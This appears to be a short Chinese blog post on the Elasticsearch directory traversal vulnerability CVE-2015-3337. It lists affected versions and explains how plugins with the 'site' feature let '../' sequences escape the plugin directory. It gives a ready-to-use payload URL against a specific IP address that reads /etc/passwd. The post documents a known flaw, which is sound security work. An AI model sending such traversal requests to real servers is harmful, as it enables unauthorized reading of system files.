ElasticSearch 目录穿越漏洞(CVE-2015-3337)

技术就是背锅侠 0条评论

jre版本:openjdk:8-jre

elasticsearch版本:v1.4.4

影响版本:1.4.5以下/1.5.2以下

在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

测试环境默认安装了一个插件:elasticsearch-head,主页在此:https://github.com/mobz/elasticsearch-head

payload

http://188.40.189.134:9200/_plugin/head/../../../../../../../../../etc/passwd

大概就是这些……

声明: 本文采用 BY-NC-SA 协议进行授权,如无注明均为原创,转载请注明转自 运维那些事
本文地址: ElasticSearch 目录穿越漏洞(CVE-2015-3337)
CVE-2015-3337 目录穿越
说点什么
登录
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...